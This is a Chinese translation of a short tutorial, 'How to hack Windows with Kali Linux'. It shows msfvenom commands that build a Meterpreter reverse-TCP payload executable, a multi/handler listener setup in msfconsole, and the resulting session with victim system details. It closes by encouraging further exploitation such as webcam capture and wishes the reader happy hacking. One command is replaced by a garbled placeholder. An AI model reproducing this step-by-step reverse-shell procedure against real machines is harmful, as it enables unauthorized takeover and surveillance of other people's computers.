如何使用 Kali Linux 黑掉 Windows
源機器詳情
Kali Linux
root@kali:/# uname -a
Linux kali 4.6.0-kali1-amd64 #1 SMP Debian 4.6.4-1kali1 (2016-07-21) x86_64 GNU/Linux
root@kali:/#
用做攻擊對象的目標機器:
Windows 7 Ultimate SP1
步驟 1:創建 Payload 程序
Payload 是一個類似於病毒或者木馬的程序,可以運行在遠程目標上 —— 為了黑掉那台機器。可以通過以下命令來創建 Payload(program.exe
),以便能使用 Kali Linux 黑掉 Windows。
root@kali:/# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.189.128 LPORT=4444 --format=exe -o /root/program.exe
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 333 bytes
Final size of exe file: 73802 bytes
Saved as: /root/program.exe
root@kali:/# ls -la /root/program.exe
-rw-r--r-- 1 root root 73802 Jan 26 00:46 /root/program.exe
通過 ls
命令,我們可以確認 Payload 程序是否成功生成在指定的位置。
步驟 2:運行 mfsconsole
命令啟動 msf 命令窗口
root@kali:# msfconsole
.,,. .
.$$$$$L..,,==aaccaacc%#s$b. d8, d8P
d8P #$$$$$$$$$$$$$$$$$$$$$$$$$$$b. `BP d888888p
d888888P '7$$$$""""''^^`` .7$$$|D*"'``` ?88'
d8bd8b.d8p d8888b ?88' d888b8b _.os#$|8*"` d8P ?8b 88P
88P`?P'?P d8b_,dP 88P d8P' ?88 .oaS###S*"` d8P d8888b $whi?88b 88b
d88 d8 ?8 88b 88b 88b ,88b .osS$$$$*" ?88,.d88b, d88 d8P' ?88 88P `?8b
d88' d88b 8b`?8888P'`?8b`?88P'.aS$$$$Q*"` `?88' ?88 ?88 88b d88 d88
.a#$$$$$$"` 88b d8P 88b`?8888P'
,s$$$$$$$"` 888888P' 88n _.,,,ass;:
.a$$$$$$$P` d88P' .,.ass%#S$$$$$$$$$$$$$$'
.a$###$$$P` _.,,-aqsc#SS$$$$$$$$$$$$$$$$$$$$$$$$$$'
,a$$###$$P` _.,-ass#S$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$####SSSS'
.a$$$$$$$$$$SSS$$$$$$$$$$$$$$$$$$$$$$$$$$$$SS##==--""''^^/$$$$$$'
_______________________________________________________________ ,&$$$$$$'_____
ll&&$$$$'
.;;lll&&&&'
...;;lllll&'
......;;;llll;;;....
` ......;;;;... . .
Taking notes in notepad? Have Metasploit Pro track & report
your progress and findings -- learn more on http://rapid7.com/metasploit
=[ metasploit v4.12.22-dev ]
+ -- --=[ 1577 exploits - 906 auxiliary - 272 post ]
+ -- --=[ 455 payloads - 39 encoders - 8 nops ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
msf >
步驟 3:進行漏洞利用的細節
- 4444 埠:你可以按照自己的想法來選擇使用哪個埠
- LHOST IP:表示 Kali Linux 機器的 IP,這裡是 192.168.189.128。 使用如下命令來查看你的 Kali Linux 機器的 IP。
root@kali:/# ip r l
192.168.189.0/24 dev eth0 proto kernel scope link src 192.168.189.128 metric 100
root@kali:/#
現在在 msf 命令窗口使用 use exploit/multi/handler
命令,如下:
msf > use exploit/multi/handler
msf exploit(handler) >
然後在接下來的命令窗口中使用命令 set payload windows/meterpreter/reverse_tcp
:
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
現在使用 LHOST 和 LPORT 來設置本地 IP 和本地埠,如下:
msf exploit(handler) > set lhost 192.168.189.128
lhost => 192.168.189.128
msf exploit(handler) > set lport 4444
lport => 4444
最後使用 exploit
命令。
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...
現在你需要在 Windows 上運行 program.exe
,一旦它在目標機器上執行,你就可以建立一個 meterpreter 會話。輸入 sysinfo
就可以得到這台被黑掉的 Windows 機器的詳情。
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 192.168.189.128:4444
[*] Starting the payload handler...
[*] Sending stage (957999 bytes) to 192.168.189.1
[*] Meterpreter session 1 opened (192.168.189.128:4444 -> 192.168.189.1:53091) at 2017-01-26 00:51:31 +0000
meterpreter > sysinfo
Computer : MANN-PC
OS : Windows 7 (Build 7601, Service Pack 1).
Architecture : x64 (Current Process is WOW64)
System Language : en_IN
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/win32
一旦你得到了這些詳細信息,就可以做更多的漏洞利用,或者通過 help
命令獲取更多信息,以便列出你可以黑掉該系統的所有選項,比如 MARKDOWN_HASH3253655ae126ee951e405b8887683cd7MARKDOWNHASH
命令獲取網路攝像頭,同樣你還可以使用其他更多的可用選項。祝你入侵愉快!!!! ←←
作者簡介:
嗨,我是 Manmohan Mirkar。很高興認識你。我接觸 Linux 是在十年前,我做夢也沒想到我有現在這樣的收穫。我的願望就是讓你學到 Linux 的知識,謝謝你的閱讀。
譯者簡介:
GHLandy —— 劃不完粉腮柳眉泣別離。
via: http://www.linuxroutes.com/quick-guide-how-to-hack-windows-with-kali-linux/
作者:Manmohan Mirkar 譯者:GHLandy 校對:wxy
本文轉載來自 Linux 中國: https://github.com/Linux-CN/archive